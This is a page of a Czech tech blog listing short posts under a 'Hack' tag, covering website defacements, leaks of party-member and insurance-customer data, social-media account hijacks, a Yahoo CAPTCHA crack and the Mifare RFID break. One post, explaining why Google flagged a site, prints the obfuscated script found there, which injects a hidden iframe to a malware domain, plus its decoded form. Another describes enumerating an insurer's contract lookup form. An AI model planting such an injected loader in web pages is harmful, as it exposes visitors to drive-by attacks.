Pravidelný občasník originálního humoru

Štítek: Hack RSS

Web IFPI je poněkud v rozkladu (hack)

Když už je řeč o IFPI (viz Anonymous se chystají zveřejnit databázi IFPI, píší to ve výzvě k odstoupení šéfce IFPI) - www.ifpicr.cz je poněkud v rozkladu. A soudě podle stupně rozkladu, je opravdu dost pravděpodobné, že někdo byl úspěšny v průniku.

Hacknutý web ODS a data o členech z něj získaná

Je hodně k neuvěření, že hack www.ods.cz (viz Názor: Etický hack ODS.cz je dobrou ukázkou toho jak protestovat v digitálním světě) mohl autorům hacku přihrát do rukou něco, co vypadá jako kompletní databáze členů ODS - 27 731 řádků v Excelu se sloupečky "celé jméno", "titul před", "funkce", "adresa", "e-mail", "datum vstupu" a "místní sdružení - název". 

Najdete tam i takové legrace jako Milana S. s datem vstupu 19.2.2038 či Jana Z. s datem vstupu 1.1.1970. Nebo Martu B. s datem vstupu 28.3.1991 (nejstarší reálné datum v tabulce).  Nebo taky 16 680 e-mailů (z 27 730 členů).

Prohlášení Anonymous k úniku dat o členech ODS

Co k tomu dodat? Že se mi nelíbí fakt, že by tato databáze měla být někde volně dostupná na Internetu (jak tvrdí například iDnes.cz v Hackeři z Anonymous pustili na web seznam všech členů ODS i s adresami) a z původního pohledu na "etický hack" se to dostává do poněkud jiné roviny. Ano, jsem toho názoru, že pustit někam data o 27 tisíci lidech je nezodpovědné (došlo-li k vypuštění na veřejnost a ne pouze médiím k zviditelnění).

Co k tomu ještě dodat? Že provozovatelé webu www.ods.cz jsou nyní právně zodpovědní za únik osobních údajů více než 27 tisíc lidí, stejně tak jako je právně zodpovědný ten, kdo umožnil, aby tato data byla volně k dispozici. Protože co je na tomhle celém také podstatné je to, že neexistuje jediný reálný důvod, proč by jakákoliv politická strana měla na svém veřejně přístupném hostingu uchovávat osobní údaje všech svých členů.

Stránky se prostě snadno kradou. Příběh Protišedi.cz a ukradené Stránky na Facebooku

Tak Protisedi.cz ukradli o víkendu Stránku na Facebooku. Tuhle Stránku, kterou už mezitím www.protisedi.cz získali zpět. Tedy podle jedné verze, ta druhá samozřejmě hovoří o tom, že to byl takový "malý virálek".

Zloděj začal na stránku psát nesmyslné vulgární výkřiky o drogách, změnil profilové foto stránky na foto exotického polonahého domorodce s metrovým návlekem na penisu a v zásadě může udělat cokoli dalšího pod jménem "proti módní šedi". "To bychom ještě považovali za žert, podstatné je, že nám byla odejmuta práva nakládat se stránkou, a to už legrace není," říká zakladatel stránky Jakub Hájek.

Jak ukrást a vrátit facebook? Nevíme, ale slavíme obsahuje dostatečný popis, včetně toho, že "hacker" si se stránkou hrál dva dny a v neděli ji "vrátil" zpět na jednoho z původních správců. Samozřejmě obsahuje i obvyklé poučení o tom, že Facebook nezajímáte a vaše problémy řešit nebude. Zatelefonovat se mu nedá (jaké překvapení, dovolali se na záznamník) a když už se vám podaří něco protlačit jinudy, tak stejně dostanete klasické "copy-paste fuck-off".

Typickou důvěřivost ukazuje i prohlášení: "Doufáme, že Facebook, který je mladou a pružnou firmou, problém přece vyřeší," říká Jakub Hájek. "Zvažujeme i právní kroky."

Facebook nic nevyřeší, neřešil, neřeší a nikdy řešit nebude. Je mu to  uplně jedno, uživatelskou podporu nemá, před lety kompletně zrušil jakékoliv možnosti kontaktu. Pár formulářů co zbylo obsluhují copy-paste roboti a většinou jim trvá týdny, než něco copy-paste univerzálního odpovědí. Zpravidla je odpověď na něco uplně jiného, než byl původní dotaz nebo problém. A zvažovat právní kroky? Ale jo, na lampárně bude dobré si stěžovat. Pardon za trochu ironie.

V Protišedi.cz mohou být rádi, že Facebook neudělal to co dělá obvykle při nahlášení podobných problémů se Stránkou. Prostě je smaže. A nic neřeší. Je to pro ně jednodušší.

Názor: Etický hack ODS.cz je dobrou ukázkou toho jak protestovat v digitálním světě

Někomu se to možná nebude líbit, ale aktuální hack www.ods.cz a umístění vyjádření na titulní stránku označím (a) za "etický hack a (b) dobrou ukázku toho, jak je možné v internetovém světě protestovat. Svým způsobem je to ekvivalent tomu, že by někdo vyvěsil transparent s vyjádřením na sídlo ODS. Případně na některé z nejvíce navštěvovaných míst ve městě.

Viz též : ODS.cz dnes brzy ráno hacknuto Anonymous

"Anonymous" se povedl slušný úlovek a jeho provedení je navíc takové, že mu s chutí zatleskám. Žádné ničení se nekoná, vše zůstalo zachováno, dokonce včetně možnosti pokračovat na klasickou hlavní stránku webu. Web fungoval a poskytl to co měl, tedy dostatečné zviditelnění kauze týkající se ACTA. A ODS zjevně neměla žádný velký problém přidanou "novou" hlavní stránku odstranit a vše uvést do původního stavu.

Osobně tento způsob protestu považuji za podstatně lepší, než doposud se vyskytující DoS/DDoS útoky - ty vedou k odstavení webu z provozu. A z hlediska "politického marketingu" nepřinášejí žádné zásadní sdělelní. Nehledě na fakt, že k odstavení většiny webů z provozu není potřeba až příliš "síly". V případě ODS.cz by bohatě stačilo, aby se běžná návštěvnost výrazněji zvýšila a použitý hosting to nebude nikdy moci zvládnout.

ODS.cz dnes brzy ráno hacknuto Anonymous

Nemohu potvrdit "na vlastní oči", ale na sociálních sítích nacházím dostatek poznámek k tomu, že na www.ods.cz se objevil zcela jiný obsah, než tam je normálně vidět.  Viz např. "Web ODS www.ods.cz právě teď hacknut Anonymous. #anonymous#ods #acta " od @PetrCanik (a zde je jeho screenshot). V 7:40 je www.ods.cz v běžném stavu.

 

DODATEK: V Anonymous v noci ovládli internetové stránky ODS najdete :

 Úspěšný útok sami ohlásili

Novinky na útok upozornil noční e-mail, ve kterém autor, podepsaný jako Anonymous, napsal: "Právě v tuto chvíli jsme ovládli web ODS, najdete tam naše vyjádření."

DODATEK 08:20: Web ODS.CZ je mimo provoz. Očekávatelné s ohledem na zájem, který nyní o web je. Možná se ale brzy dočteme, že Anonymous podnikli DoS útok. 

DODATEK 10:13: "Lepší reklamu zdarma jsme si ve volebním roce nemohli přát. Návštěvnost webu ODS se dnes ráno zvýšila řádově o stovky procent," reagoval mluvčí strany Tomáš Bartovský. "Ceníme si také toho, že si pro svůj útok vybralo hnutí Anonymous z webů českých politických stran pouze stránky ODS," dodal mluvčí (viz Hackeři napadli web ODS, strana děkuje za reklamu

Kdyby tak ODS tuhle energii vynaložilo k jasnému odmítnutí ACTA. Ale co nakonec očekávat od strany, která už několik let žije odtržena od reality.

Na Romea.cz se objevil podivný text útočící na Sdružení Romea a Romy

Vzdělávací cyklus Sdružení Romea najdete na skola.romea.cz/cs/uvod/ a aktuálně v úvodu najdete poněkud zvláštní text, který vypadá jako kdyby tam nejspíš neměl co pohledávat. Že by nějaký hacker našel vrátka?

Sdružení ROMEA využívá nechutných výhod státu za pomoc lidem, kteří o ni evidentně nestojí. Jak se říká, u nás funguje rasismus naopak. Romové využívají svých výhod k utlačování všech ostatních a přitom se tváří, že je nejvíc ubližováno právě jim! Když jste tak utlačovaní, my vám najdeme pěkný kousek země, třeba v Rusku, všechny co na našem území nemají platné doklady, nebo se zdržují bez platného víza déle jak 4 měsíce. A pro jistotu vám tam zavedeme víza, abychom vás nemohli jezdit obtěžovat a „diskriminovat“!

Hack: Miui.cz

Tak www.miui.cz je hacknuté, s titulkem linuXploit_crew BRAZILIAN HACKERS.

Nebuďte bátora, Facebook Stránka se nedá deaktivovat

Nebuďte bátora, Facebook Stránka se nedá deaktivovatTak panu Bátorovi opět teoreticky "hackli" Facebook. Dokonce mu prý opět hackli "mail na Seznamu" (a to i přesto, že si to ochránil "za dohledu IT experta"). Pan Bátora opět klasicky lže - v níže uvedeném vyjádření najdete perlu, ve které tvrdí, že "měl facebookovou stránku deaktivovánu, tj. zablokovánu pro veškerý přístup, včetně přístupu vlastního". Nic takového u Facebook Stránky není možné, jediné co by Bátora mohl udělat je zbavit se administrátorství stránky a tím ztratit možnost správy stránky. Facebook Stránka nejde deaktivovat.

""Svoji facebookovou stránku jsem měl již týden deaktivovánu, tj. zablokovánu pro veškerý přístup, včetně přístupu vlastního. Včera jsem přes svůj email zjistil, že stránku obsluhuje někdo jiný. Rád bych předešel jakýmkoliv dalším spekulacím médií, proto znovu prohlašuji, že s aktuálními zprávami na svém Facebooku nemám nic společného," říká Ladislav Bátora a dodává: „Zároveň byla hackerem opět prolomena moje emailová schránka na serveru Seznam.cz, a to navzdory všem opatřením, která jsem před dvěma týdny na její ochranu podnikl za dohledu IT experta.

Jediné vysvětlení tedy opět je - Bátora lže a opět tak řeší to, že na Facebooku zveřejňuje věci nevhodné, ke kterým se nechce později přiznat. A stále platí, Nebuď bátora aneb jak bezpečněji používat Facebook.

Samozřejmě je možné, že Bátora hovoří o profilu na Facebooku - ten deaktivovat jde, ale Bátora je opět mimo - nezablokuje se tím přístup pro něj samotného. Zábavné na celém tom cirkusu je opět to, že Bátora na svůj (teoreticky) "hacknutý" profil pověsil odkaz na výše uvedené vyjádření - jenom těžko lze tedy přijmout fakt, že by profil byl hacknutý - Bátora ho stále ovládá, stejně jako v předchozích případech.

Zdroj: MŠMT: Další útok na Facebook a email Ladislava Bátory

Když už vám hacknou Twitter účet, myslete i na váš Facebook

Že @ert už zase hackli Twitter účet asi není překvapující, není to poprvé co se do podobných problémů dostal. Z Twitteru už tu dávku spamu vytvořeného "hackerem" smazal, ale na Facebooku vše nechává, nejspíš proto, aby si to co nejvíce užili jeho přátele. Poněkud bezohledné, ale nejvíc to ukazuje na klasickou nevhodnost automatického propojení mezi sociálními sítěmi.

Bátorův "hacklý" Facebook aneb cirkulární definice blba

Ladislav Bátora - Facebook Profile FotoCestou z Litoměřic jsem se v rádiu bavil posloucháním o nové kauze okolo Bátory. Už zase něco napsal o Knížeti. Už zase to napsal na Facebook. A už zase to na jeho "uzamčeném" profilu viděl nějaký novinář, kterého má "čistě náhodou" v "přátelích".

A aby zase nepadala kvůli Facebooku vláda, tak přišel s geniálním vysvětlením, že mu prý ten Facebook někdo hacknul. A vedle Facebooku mu taky prý hacknul mail. Pak jsem dojel domů a volali z Práva, co že si o tom myslím. Nakonec to docela věrně zapsali do Senilní zednář Schwarzenberg, objevilo se na Facebooku Bátory. Je to podvod, tvrdí

A co že si o tom myslím?

„Vysvětlení celé věci je velmi jednoduché, když tedy budeme předpokládat, že pan Bátora je absolutní blb. Pak se mu může na účet dostat kdekdo: někomu řekne své heslo, používá hesla slabá. Osobně se ale domnívám, že pan Bátora je velmi inteligentní. Absolutně proto neuvažuji o tom, že se mu někdo na účet dostal. Kdyby tomu tak bylo, tak je to opravdu nesvéprávný blb, který se nedokáže postarat o své vlastní věci a který nemá co dělat v politice,“ řekl Právu počítačový expert a publicista Daniel Dočekal.

Ano, pardon, taková malá cirkulární definice. Bátora mi skutečně přijde jako inteligentní člověk. Akorát ta výmluva na hacknutý účet je dost laciná. Když už člověk něco řekně, měl by si za tím stát. A když už něco píše na Facebooku, tak je poněkud zvláštní z toho dělat Kauza a málem kvůli tomu pokládat vládu. Svědčí to bohužel o tom, že těm "nahoře" zjevně nejde o tuto zemi a nezajímá je, že dostali mandát od voličů. Jde jim v první řadě o peníze, to už víme. A v druhé řadě jsou jejich ega tak velká, že možná zastíní i ten mamon.

Mimochodem, cesta do Litoměřic po staré silnici (no prostě nemám dálniční známku) je krásná. Říp je nezapomenutelný kopec, sluníčko, krásné počasí, prázdné silnice, všechno zelené okolo. Možná by se ta banda tajtrlíku občas měla projet, přivádí to na úplně jiné myšlenky. Česko umí být krásné. Bez politiků by zjevně bylo ještě krásnější.

The Sun hacknuto Lulzsec

Aféra okolo Murdochova mediálního impéria má další zajímavou událost. The Sun (aktuálně mimo provoz) hackli Lulzsec a na hlavní stránku umístili zprávo o úmrtí Murdocha.

The Sun hacknuto Lulzsec

Podrobnosti v Murdoch’s Sun Newspaper Hacked by LulzSec (Mashable), LulzSec Group Hacks The Sun's Website And Posts Fake Story On Rupert Murdoch's 'Suicide' (Business Insider) a v Phone-hacking scandal: Monday 18 July (Guardian)

Hack: Open-Tube.com

Open-tube.com hacknuto. Za normálních okolností jde o "Low Cost Software Reviews, Alternative Software Reviews, Cost Effective Solutions, Technology Reviews, Open Source reviews and Web 2.0 reviews". Nyní "Hacked By Akkalegacy".

Nový červík na Twitter aneb twitteristi milují anální sex s kozou

Twitter se zjevně více a více přibližuje Facebooku. A nepotřebuje k tomu žádné extrémně chytré API, stačí nová verze Twitteru (ale možná to ani s ní nemá nic moc společného) a další bezpečnostní nedostatek. Protentokrát stačí kliknout na lákavý odkaz a rázem se ve vašem vlastním profilu obejví "I love anal sex with goats". 

Twitter Word - I Love Anal Sex With Goats

Twitter samotný k tomu vydal následující Malicious Links on Twitter :

A malicious link is making the rounds that will post a tweet to your account when clicked on. Twitter has disabled the link, and is currently resolving the issue.

UPDATE Sun Sep 26 18:41:49 UTC 2010: We’ve fixed the exploit and are in the process of removing the offending Tweets.

Sociální inženýrství v praxi - Tweet Cloud

Na tenhle příklad je dobré se kouknout, je poměrně dost chytrý. Otázka je, jestli se někdy dozvíme, kolik hloupých uživatelů Twitteru dobrovolně odevzdalo svojí e-mail adresu (mimo jiné první krok k hacknutí Twitter účtu).

Apple iTunes "hacknutý" stejně jako možná právě váš iTunes účet

Jakkoliv zpočátku problém vypadal jako ojedinělý případ vývojáře využívajícího hacknuté účty k nákupu vlastní aplikace, skutečnost je jiná. Daleko horší. Nejhlídanější obchod na světě je plný aplikací sloužících ke krádežím účtů. A pro Steva Jobse je důležitější chránit před pornem než před krádeží peněz z účtů

HTML Injection na YouTube.com - velký malér a ještě větší ostuda

Jedno je důležité, ignorujte média tvrdící něco o tom, že YouTube.com bylo hacknuto. Co je ale důležitější, pokud YouTube.com aktuálně používáte, můžete být hacknuti vy. HTML Injection totiž umožňuje do komentářů vkládat skripty a to je právě to, co se na YouTube včera dělo.

Google zvažuje odchod z Číny a odmítá cenzorovat výsledky hledání (Firemní síť Google hacknuta)

Na Google blogu se objevil text A New approach to China. Píše se v něm o tom, že Google v polovině prosince zjistil cílený a  promyšlený útok na firemní infrastrukturu z Číny, který vedl ke krádeži duševního vlastnictví. Jinými slovy, Google hackli firemní síť, dostali se dovnitř a odtamtud něco získali. Google k tomu dodává, že podobný útok byl vedený i na dalších minimálně dvacet velkých společností. A upozorňuje, že  hlavním cílem útoku bylo získat přístup ke Gmail účtům činských aktivistů bojujících za lidská práva. A dodává, že věří tomu, že se útočníkům tyto informace nepodařilo získat. Je to zajímavé a poučné čtení a Google přidává i některé další informace, které mohou být užitečné pro kohokoliv, kdo se pohybuje v oblasti počítačové bezpečnosti.

Co je ale ještě zajímavější je, že Google v textu píše, že "rozhodli jsme se, už nejsme ochotni pokračovat v cenzuře výsledků na Google.cn".  A chystá se jednání s činskou vládou o tom, jak je možné toto zajistit. Pokud by to nešlo, je velmi pravděpodobné, že by Google z Číny odešel. 

Twitter Hacked, Defaced By “Iranian Cyber Army” (Developing)

We’ve received multiple tips right around 10 pm that Twitter was hacked and defaced with the message below. The site is currently offline. We’re looking into this and waiting on a response from Twitter.

The message reads:

Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

iRANiAN.CYBER.ARMY@GMAIL.COM

U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST ;)
Take Care.

Staňte se administrátory opuštěných skupin na Facebooku

Důležitější ale je - pokud spravujete skupiny nebo stránky na Facebooku - nikdy nemějte jenom jednoho správce. Je to velmi nebezpečné pro budoucnost jakékoliv skupiny či stránky. Více na konci článku.

Smlouvy pojišťovny UNIQA k dispozici na webu

"Zdar panackove a panenky, Mel jsem hezke prazdniny a ted je cas zacit pracovat. Tady najdete seznam par tisic smluv pojistovny Uniqua, tedy presneji jejich zakazniky spolu s rodnym cislem a telefonem. Jestli si chcete prohlednout celou smlouvu, jdete sem https://cesty.uniqa.cz/dodatecnytisk.aspx" - doslovná citace z http://www.fotoportret.sk/to.html, kde jsou momentálně i další informace. Například o tom kde můžete získat kompletní seznam všech smluv a také kompletní texty všech smluv. 

 

Zmíněná adresa na Uniqa.cz skutečně umožňuje "dodatečný tisk smlouvy" zadáním čísla smlouvy a rodného čísla pojistníka. Dokonalá ukázka (pardon) idiocie, protože něco takového doslova volá po jednoduchém skriptu, který bude postupně dosazovat všechna možná čísla smluv a generovat k nim rodná čísla. Dokud se netrefí.

Dodatek o den později -

Na fotoportret.sk už nic nenajdete, stejně tajk jako Uniqa zrušila "cesty.uniqa.cz" (pro jistotu tam neběží ani webový server). A pokud chcete vidět dokonalou ukázku totálního mimoňst ví, tak zde:

"Pojišťovna se o úniku dat dozvěděla až od médií. Podle mluvčí Uniqy Evy Svobodové považuje pojišťovna informaci za velmi závažnou. "Tak to nám to asi někdo fakt napadl. Samozřejmě musím začít interně ihned jednat, aby se to napravilo," řekla Svobodová." (viz článek na iDnes)

Hack: Ahyde.blog.cz

 

Blogy přicházejí, odcházejí. A také bývají hacknuté. Byť v tomto konkrétním případě jde o specifickou kategorii zvanou "defacement" - získání přístupu k něčímu webu či blogu slouží k (teoreticky) sdělení nějakého nesmírně důležitého vyjádření.

V ahyde.blog.cz se toho samozřejmě moc nedozvíte, pokud, což je taky možné, to nakonec není sám Ahyde, kdo se dal na pravou víru (Hacked by TNCAkadroS tak jako tak neříká o nic víc) .

 

Nejvyšší registrátor domén přišel o vlastní doménu

Docela zábavná záležitost, ICANN (Internet Corporation for Assigned Names and Numbers) se podařilo na krátkou dobu přijít o vlastní doménu (icann.com) a ještě doménu své divize Internet Assigned Numbers Authority (iana.com). Ke ztrátě došlo klasický způsobem, falešným požadavkem na převod domény u jednoho z registrátorů domén.

Převod se podařilo během zhruba 20 minut vrátit zpět, ale změny v DNS pochopitelně mezitím prošly do všech koutů a nějakou chvíli m ůže trvat, než se vše vrátí do "správného" stavu. ICANN/IANA používají .com domény jenom k přesměrování na .org verze - těch se útok netýkal. ICANN na svém webu slibuje, že se z útoku poučí a zajistí, že se podobné útoky nebudou moci již opakovat.

www.kisswow.com.cn/m.js aneb SvětSítí.cz vám může hacknout počítač

Další v článku jmenovaný virus/malware najdete i na dalších českých stránkách - je mezi nimi i pár známých jmen - Strabag, Alza či SPŠ Zlín

Vista padla za oběť hackerovi, Ubuntu Linux vydržel

Největším nebezpečím pro dnešní počítače jsou vedle jejich vlastních uživatelů hlavně plug-in v prohlížečích. Píšu o tom v dnešním článku Obchod s kradenými osobními údaji jen kvete na Lupě.  A ejhle, kritická chyba v Adobe Flash přehrávači napomohla tomu, že hackerská soutěž PWN To OWN má dalšího vítěze, Windows Vistas Ultimate je prostě Onwed. A jediné co zůstalo nehacknuté je Ubuntu Linux.

Hacknout se podařilo i MacBookAir s pomocí chyby v Safari prohlížeči. Podle informací o soutěží je chyba ve Flash playeru prozatím neopravená ...

RFID karty Mifare Classic hacknuty, problémy mohou být i v ČR

O tom jak může být RFID nebezpečné jsem v minulosti psal již několikrát, největší článek vyšel  jižv září 2004 v Softwarových novinách (RFID aneb Svět ve kterém víte všechno o všech a všem). Americký PC World čersvtvě upozorňuje na velmi závažný problém s Mifare Classic RFID čipy - jejich zabezpečení bylo rozlousknuto a bez jakýchkoliv problémů je možné tuto technologii, používanou ve více než 800 milionech digitálních přístupových i platebních kartách po celém světe, zneužívat. Zejména tak, že je možné vytvořit klon libovolné karty. Což může znamenat výrazné narušení  bezpečnosti budov, které využívají RFID přístupové karty. A stejně nebezpečí hrozí i tam, kde jsou RFID karty používany jako elektronická peneženka či předplatní karty.

Mifare Classic je používáno ve významné míře i v České republice. Letmé využití Google umožňuje získat základní představu - podle dostupných informací slouží podobné karty jako Modré karty pro České dráhy (dodatek, České Dráhy přešly na pokročilejší DESfire model, kterého se problém netýká, takže dobrá zpráva), používají je autobusoví dopravci (například Veolia, MHD Liberec, atd), nasazeny jsou i na pražském magistrátě. A tatáž technologie bude použita v tzv. Open card systému, který pražský magistrát plánuje plošně nasadit po celé Praze a použít i například jako parkovací a předplatné karty.

Hack tuhle, hack támhle, hack kam se podíváš

Hacked : www.ivz.cz/i-divadloJe to tak, hacknutých stránek najdete na českém Internetu dostatek. Stačí použít vyhledávač a ejhle, začnou se sypat jedna po druhé.

Hacked : Gimp.czNěkteré jsou hacknuté opravdů "důkladně", co třeba takový www.gimp.cz , který sice píše něco jako "Omluvte dočasnou nedostupnost", ale ve skutečnost má přístupné všechny stránky uvnitř, včetně dodatku tam umístěného neznámým "dobrodincem" (screenshot vpravo).

Pár dalších screenshotů přidávám, z jejich popisků zjistíte, že mezi hacknutými je leccos (třeba i Politikon.com). Dalo by se jich vyrobit desítky. Třeba z řady webů herních klanů, které jsou postižené opravdu hodně. Nebo možná i stovky - vynechal jsem totiž velké množství diskusních fór, do kterých je stále možné vkládat kompletní HTML kód a tak se mohou pyšnit opravdu závratným množstvím "hacků" (hodně polovičatých).

Zábavný je například hacknutí www.sluzbyasp.cz, jeho hlavní stránka je netknutá a informuje o ukončení činnost. ale uvnitř (screenshot) se to hemží "hacked". 

Hacked : Kastelan.cz Hacked : www.chroniclers.goo.cz

Upozornění - než na někeré z hacknutých webů vstoupíte, měli byste vědět, že tam můžete narazit na nějaké to malware. I k tomu totiž podobné aktivity slouží.

Hacked : Media.Politikon.cz Hacked : UkFashion.cz   

Yahoo hackli CAPTCHA

Nepříjemná novina, týmu ruských hackerů se podařilo prolomit CAPTCHA používanou Yahoo!, která prozměnu všeobecně byla uznávaná jako jedna z nejtěžších. V Yahoo! CAPTCHA Cracked je odkaz na RapidShare soubor užitečný těm, kdo chtějí vídět jak to je vlastně uděláno.

V některých médiích se objevuje, že sice jde o hack, ale má jenom 35% šanci na úspěšnost. K tomu je nutné dodat, že to vůbec nic nemění na tom, jak závažné to je. 35% úspěšnost znamená, že v průměru každý 3 pokus (a ještě o něco více) uspěje. A pokud autoři spamu (poštovního či komentářového) prostě zkusí stovku tisíc pokusů za jeden den, tak prostě uspějí ve více jak 35 000 případech. A výpočetní výkon k tomu použitý je nebude stáv vůbec nic.

CAPTCHA je přitom pro (nejenom) Yahoo! jedním ze způsobů jak se například bránit tomu, aby si spammeři hromadně zakládali e-mailové schránky či zprovozňovali webové stránky plné škodlivého obsahu. Pokud je nutné zapojit do podobných aktivit lidský element, už se zpravidla nevyplatí.

O prolomitelnosti Yahoo! CAPTCHA se hovořilo již poměrně dlouho. Podle některých zdrojů řešení již existovalo "in the wild", neboli někde na spammerské/hackerské scéně. Popisované řešení s 35% úspěšností je nové, vytvořené právě jako reakce na domněnky, že někdo již podobné řešení má (a pochopitelně i používá).

Web prestižního titulu BusinessWeek.com šířil virus

Virus se šíří (a šířil) i z českých stránek - historický výskyt lze snadno nalézt v Google. Zajímavé je i to, že jde s největší pravděpodobností o kompromitaci prostřednictvím SQL Injection

Proč ZemePohadek.cz stále obsahuje kód viru? A proč je tomu tak u dalších webů?

Princip je velice jednoduchý. Robot prohledává internet a snaží se dostat k souborům webových serverů. Prolomení hesla do FTP poslouží dokonale, protože potom už stačí pouze změnit HTM/HTML dokumenty.

Proč je ZemePohadek.cz blokovaná Google

Na včerejším vyhlašování Křišťálové Lupy se řešilo i to, proč je www.zemepohadek.cz v Google označována jako web, který může poškodit váš počítač. Taťána Le Moigne, které tenhle web patří, ředitelka českého Google, nevěděla proč, dokonce tam padaly vysvětlení v podobě chyby Google.

Ona to žádná chyba nebude. ZemePohadek.cz je hacknutý web, na který někdo umístil škodlivý kód, který se pomocí exploitů snaží hacknout počítače všech návštěvníků. Je to vcelku prosté a stačí se podívat na konec kódu stránek tohoto webu. Najdete tam toto:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Asi dost jasně tušíte, že to tam nemá co dělat :) Případné podrobnosti viz například zde. Výsledný script (IFRAME) směřuje na doménu trffc.org, podle Google snadno zjistíte, že je poněkud profláklá.

<iframe width="0" height="0" style="display: none;" src="http://trffc.org/in.cgi?default">

Případně viz též MalwareDomainList. Trffc.org je v současné době (naštěstí) poněkud mimo provoz.


<<< Novější články ( strana 2 z 3 ) Starší články >>> ( celkem článků: 62)